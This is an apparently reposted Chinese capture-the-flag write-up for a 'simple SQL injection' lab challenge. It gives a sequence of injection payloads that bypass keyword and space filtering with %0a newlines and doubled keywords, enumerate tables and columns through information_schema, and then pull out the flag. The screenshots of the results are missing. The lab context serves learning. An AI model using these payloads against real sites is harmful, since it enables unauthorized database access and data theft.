實驗吧之簡單的sql注入1
阿新 • • 發佈:2018-12-31
實驗吧之簡單的sql注入1
進來頁面:
查詢注入點!輸入1’報錯,存在注入
輸入1’ select union 1發現報錯
而且報錯只輸出一個1
懷疑是不是select和union被過濾掉了
輸入’ununionion selectselect 1–發現
說明–也被吃掉了,而且後臺對於union、select進行了處理,應該是將關鍵詞和空格一起吃掉了。
輸入’union%0aselect%0a1’發現:
ps:直接加在id=後面,輸入框提交會報錯,我也不知道為啥(流下了沒有技術的淚水)。
初步注入成功!!
'union%0aselect%0agroupgroup_concat_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()%0aand’1發現
where後面的都沒了,是不是table_schema被過濾了,雙寫繞過試試。
ps:加在id=後面,提交還是報錯,後面就直接加在id=後面了(又流下了沒有技術的淚水)
看見有個flag的資料庫
繼續
結果發現這次過濾了很多的東西
直接輸入
'union%0aselect%0agroupgroup_concat_concat(columncolumn_name_name)%0afrom%0ainformationinformation_schema.columns_schema.columns%0awhere%0atabletable_schema_schema=database()%0aand’1
得到:
接下來就是繼續了
‘union%0aselect%0agroupgroup_concat_concat(columncolumn_name_name)%0afrom%0ainformationinformation_schema.columns_schema.columns%0awhere%0atabletable_schema_schema=database()%0aand%0atable_name=‘flag
得到:
最後輸入1’%0aunion%0aselect%0aflag%0afrom%0aflag%0awhere%0a’1’='1
得到:
得到flag。